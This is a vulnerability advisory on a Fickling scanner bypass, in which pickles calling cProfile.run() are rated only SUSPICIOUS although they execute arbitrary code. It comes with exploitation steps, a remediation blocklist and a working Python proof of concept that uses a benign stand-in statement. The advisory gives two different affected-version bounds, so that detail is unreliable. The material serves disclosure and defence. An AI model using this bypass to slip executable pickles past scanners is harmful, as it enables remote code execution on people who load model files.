### Vulnerability Key Information

- **Vulnerability Name:** Fickling Blocklist Bypass: cProfile.run()
- **Severity:** High
- **Affected Versions:** <= v0.1.7
- **CVE ID:** None
- **Weaknesses:** CWE-184 (Incomplete List of Disallowed Inputs), CWE-502 (Deserialization of Untrusted Data)

#### Vulnerability Description

Fickling versions up to v0.1.6 do not treat Python's `cProfile` module as unsafe. As a result, a malicious pickle that invokes `cProfile.run()` is rated `SUSPICIOUS` rather than `OVERTLY_MALICIOUS`, even though `cProfile.run(statement)` executes `statement` as arbitrary Python code in the `__main__` namespace. Users who rely on Fickling's verdict to decide whether a pickle is safe to deserialize can therefore be induced to load a pickle that executes attacker-controlled code on their system.

#### Impact

Any process or product that uses Fickling as a security gateway in front of pickle deserialization is affected: the gateway reports a severity that does not reflect the fact that the pickle runs arbitrary code when loaded.

#### Vulnerability Details

`cProfile` is missing from Fickling's blocklist of unsafe module imports in `fickling/analysis.py`. `cProfile.run(statement)` and `cProfile.runctx(statement, globals, locals)` hand their first argument to `exec()` (wrapped in a profiler), so a pickle whose `REDUCE` call targets `cProfile.run` has the same effect as one that targets `builtins.exec`, but references no module on the list. This is the same root cause as CVE-2025-67748 (`pty`) and CVE-2025-67747 (`marshal`/`types`): the blocklist is an incomplete enumeration of the standard-library entry points that execute code.

#### Exploitation Steps

1. Create a malicious pickle whose `__reduce__` callable is `cProfile.run` and whose single argument is the Python statement to execute.
2. Analyze the pickle with Fickling and confirm that it is rated only `SUSPICIOUS`.
3. Load the pickle with `pickle.loads()` and confirm that the statement runs; when the pickle is attacker-supplied (a downloaded model file, for example) this is remote code execution (RCE).

#### Remediation Recommendation

Add the following to the unsafe-import blocklist in `fickling/analysis.py`:

- `cProfile`
- `cProfile.run`
- `cProfile.runctx`
- `_lsprof` (the C module underlying `cProfile`)

Because the check is a blocklist, adding these entries closes this bypass but not the class of bug; consumers should treat a scanner verdict as one signal and not load untrusted pickles on the strength of that verdict alone.

#### Scope of Impact

Any user or system relying on Fickling to check the safety of pickle files, including but not limited to:

- ML model validation pipelines
- Model hosting platforms (e.g., Hugging Face, MLflow, etc.)
- Security scanning tools using Fickling
- CI/CD pipelines validating pickle artifacts
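The following is an added, self-contained example illustrating the exploitation steps and the remediation above; it is not code from the advisory or from the Fickling project. It builds the pickle described in the exploitation steps, disassembles it with the standard library's `pickletools` to show the `GLOBAL` reference to `cProfile.run`, checks that reference against a simplified, constructed model of a module blocklist (first without `cProfile`, then with the entries the remediation recommends), and finally loads the pickle. The executed statement is a constructed, benign stand-in for an attacker's payload: it sets an environment variable instead of running a shell command. The names `CProfilePayload`, `VULNERABLE_BLOCKLIST` and `FIXED_BLOCKLIST` are assumptions for this example and do not correspond to anything in Fickling.

```python
import io
import os
import pickle
import pickletools
from contextlib import redirect_stdout
from typing import List, Optional, Tuple

# Constructed, benign stand-in for an attacker's statement. A real payload would
# call os.system() or open a reverse shell here; this one only sets an environment
# variable so that the effect of loading the pickle can be observed safely.
MARKER = "CPROFILE_PICKLE_DEMO"
STATEMENT = f"import os; os.environ[{MARKER!r}] = '1'"


class CProfilePayload:
    """Pickles to a call of cProfile.run(STATEMENT) rather than to this object.

    cProfile.run() passes its first argument to exec() inside a profiler, so the
    unpickler executes STATEMENT as arbitrary Python without any reference to
    os, subprocess, builtins or another module that a blocklist would catch.
    """

    def __reduce__(self):
        import cProfile
        return (cProfile.run, (STATEMENT,))


def build_payload() -> bytes:
    # Protocol 2 emits the classic GLOBAL opcode, which reads most clearly in a
    # disassembly; protocol 4+ uses STACK_GLOBAL for the same effect.
    return pickle.dumps(CProfilePayload(), protocol=2)


def imported_globals(payload: bytes) -> List[Tuple[str, str]]:
    """Return the (module, name) pairs the pickle resolves via GLOBAL/STACK_GLOBAL.

    Simplified: STACK_GLOBAL is resolved from the two most recently pushed
    strings, which is how pickle.dumps() emits it; a hand-crafted pickle could
    arrange the stack differently, and a real analyzer has to model that.
    """
    found: List[Tuple[str, str]] = []
    recent_strings: List[str] = []
    for opcode, arg, _pos in pickletools.genops(payload):
        if opcode.name in ("SHORT_BINUNICODE", "BINUNICODE", "UNICODE",
                           "STRING", "BINSTRING", "SHORT_BINSTRING"):
            recent_strings.append(arg)
        elif opcode.name == "GLOBAL":
            module, name = arg.split(" ", 1)
            found.append((module, name))
        elif opcode.name == "STACK_GLOBAL":
            name = recent_strings.pop()
            module = recent_strings.pop()
            found.append((module, name))
    return found


# Constructed model of a module blocklist (assumption: not Fickling's own list).
VULNERABLE_BLOCKLIST = {"os", "subprocess", "sys", "builtins", "pty", "marshal", "types"}
# The same list with the entries the remediation section recommends.
FIXED_BLOCKLIST = VULNERABLE_BLOCKLIST | {"cProfile", "_lsprof"}


def flagged_imports(payload: bytes, blocklist: set) -> List[Tuple[str, str]]:
    """Simplified blocklist check: flag a GLOBAL whose top-level package is listed."""
    return [(m, n) for m, n in imported_globals(payload)
            if m.split(".")[0] in blocklist]


def load_payload(payload: bytes) -> Optional[str]:
    """Deserialize the pickle as an unsuspecting consumer would; return the marker value."""
    os.environ.pop(MARKER, None)
    with redirect_stdout(io.StringIO()):  # swallow the profiler's stats table
        pickle.loads(payload)
    return os.environ.get(MARKER)


if __name__ == "__main__":
    payload = build_payload()
    print("globals referenced:", imported_globals(payload))
    print("flagged by list without cProfile:", flagged_imports(payload, VULNERABLE_BLOCKLIST))
    print("flagged by list with cProfile:   ", flagged_imports(payload, FIXED_BLOCKLIST))
    print("marker set after pickle.loads():", load_payload(payload))
```

Run it and the vulnerable list flags nothing while the fixed list flags `('cProfile', 'run')`, and `pickle.loads()` sets the marker, which is the concrete form of the "SUSPICIOUS but executes code" mismatch the advisory describes. To reproduce against Fickling itself, write `build_payload()` to a file and run it through Fickling's analysis as the exploitation steps describe.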